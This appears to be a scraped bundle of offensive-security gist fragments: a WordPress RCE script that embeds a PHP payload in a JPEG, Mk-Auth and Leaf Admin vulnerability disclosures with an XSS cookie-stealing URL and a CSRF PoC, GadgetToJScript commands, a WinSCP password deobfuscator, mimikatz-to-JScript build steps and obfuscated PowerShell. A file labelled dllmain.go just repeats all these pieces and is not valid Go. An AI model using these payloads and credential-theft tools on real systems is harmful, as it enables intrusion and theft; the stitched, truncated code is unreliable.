ifundef alacerda

## wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

## gist:8fd4557e585a8707e9d3b798968e24c1
[Suggested description]
The profile photo upload feature in Leaf Admin 61.9.0212.10 f allows
Unrestricted Upload of a File with a Dangerous Type.

------------------------------------------

[Additional Information]
Leaf Admin is a virtual appliance running a web application used to
manage Internet Service Providers (ISP). It controls which users are
enabled or disabled on the system (due to payment issues), connection

## GadgetToJScript Command Reference
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta

# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js

# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs

# Command to generate VBA code using GadgetsToJScript

## winscp-deobfuscator.py
import argparse

class Decrypter:
	SIMPLE_STRING = "0123456789ABCDEF"
	SIMPLE_MAGIC = 0xA3

	def __init__(self, password):
		self.data = password

	def next(self):

## Instructions-to-mimikatz-js.txt
It is basically a wrap of the following projects:
 - mimikatz (https://github.com/gentilkiwi/mimikatz)
 - mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
            Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
 - DotNetToJScript (https://github.com/tyranid/DotNetToJScript)

 INSTRUCTIONS:
 1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
 2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though)
    b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it

## mkauth_19.01_idor
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to leak other user’s sensitive information like CPF (Personal Number used in Brazil) by manipulating the number of the invoice requested.
Additional Information:
Any authenticated user can read arbitrary invoices even if it does not belong to the authenticated user. The response leaks sensitive information of the user that the invoice refers to. See below an example of a GET request:

GET /central/recibo.php?titulo=00006 HTTP/1.1
Vulnerability Type:
CWE-639: Authorization Bypass Through User-Controlled Key

## mkauth_19.01_user_impersonation
Mk-Auth User Impersonation Via Reflected XSS and Unprotected Session Cookie

Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to steal and reuse an admin session token by abusing a reflected XSS and an unprotected cookie.
Additional Information:
The session token (centralmka2) does not have the HTTPOnly flag set what allows a javascript code to read its content. In addition to that, the parameter “registro” of the “logs_ajax.php” page is vulnerable to reflected XSS which allows an attacker to take advantage of the misconfigured cookie. See below an example of a malicious request:
http://<mkserver>/admin/logs_ajax.php?registro=0&tipo=todos%27%3balert(document.cookie)%2f%2f
Vulnerability Type:

## mkauth_19.01_csrf_change_password
Mk-Auth CSRF in Clients Change Password Form

Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to change a user’s password by enticing a logged user to access a malicious webpage.
Additional Information:
A malicious actor may craft a web page that, when a user that is authenticated on Mk-Auth (on “central” module), access the page, the user’s password is automatically replaced by one chosen by the attacker.
PoC:
<html>

## gist:28ba5718f24881fb2dfc99b0d829e7e1
function sandbanks {
    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
    )
    $tzXzjieG99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())

## dllmain.go
package main

//#include "dllmain.h"
import "C"
	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
	[Suggested description]
	The profile photo upload feature in Leaf Admin 61.9.0212.10 f allows
	Unrestricted Upload of a File with a Dangerous Type.

	------------------------------------------

	[Additional Information]
	Leaf Admin is a virtual appliance running a web application used to
	manage Internet Service Providers (ISP). It controls which users are
	enabled or disabled on the system (due to payment issues), connection
	# Command to generate HTA code using GadgetsToJScript
	GadgetToJScript.exe -w hta

	# Command to generate JS code using GadgetsToJScript
	GadgetToJScript.exe -w js

	# Command to generate VBS code using GadgetsToJScript
	GadgetToJScript.exe -w vbs

	# Command to generate VBA code using GadgetsToJScript
	import argparse

	class Decrypter:
	SIMPLE_STRING = "0123456789ABCDEF"
	SIMPLE_MAGIC = 0xA3

	def __init__(self, password):
	self.data = password

	def next(self):
	It is basically a wrap of the following projects:
	- mimikatz (https://github.com/gentilkiwi/mimikatz)
	- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
	Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
	- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)

	INSTRUCTIONS:
	1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
	2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though)
	b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it
	Product Description:
	Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
	Vulnerability Description:
	It is possible to leak other user’s sensitive information like CPF (Personal Number used in Brazil) by manipulating the number of the invoice requested.
	Additional Information:
	Any authenticated user can read arbitrary invoices even if it does not belong to the authenticated user. The response leaks sensitive information of the user that the invoice refers to. See below an example of a GET request:

	GET /central/recibo.php?titulo=00006 HTTP/1.1
	Vulnerability Type:
	CWE-639: Authorization Bypass Through User-Controlled Key
	Mk-Auth User Impersonation Via Reflected XSS and Unprotected Session Cookie

	Product Description:
	Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
	Vulnerability Description:
	It is possible to steal and reuse an admin session token by abusing a reflected XSS and an unprotected cookie.
	Additional Information:
	The session token (centralmka2) does not have the HTTPOnly flag set what allows a javascript code to read its content. In addition to that, the parameter “registro” of the “logs_ajax.php” page is vulnerable to reflected XSS which allows an attacker to take advantage of the misconfigured cookie. See below an example of a malicious request:
	http://<mkserver>/admin/logs_ajax.php?registro=0&tipo=todos%27%3balert(document.cookie)%2f%2f
	Vulnerability Type:
	Mk-Auth CSRF in Clients Change Password Form

	Product Description:
	Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
	Vulnerability Description:
	It is possible to change a user’s password by enticing a logged user to access a malicious webpage.
	Additional Information:
	A malicious actor may craft a web page that, when a user that is authenticated on Mk-Auth (on “central” module), access the page, the user’s password is automatically replaced by one chosen by the attacker.
	PoC:
	<html>
	function sandbanks {
	[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
	[CmdletBinding()]
	Param (
	[Parameter(Position = 0)]
	[ValidateNotNullOrEmpty()]
	[String]
	$ModuleName = [Guid]::NewGuid().ToString()
	)
	$tzXzjieG99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())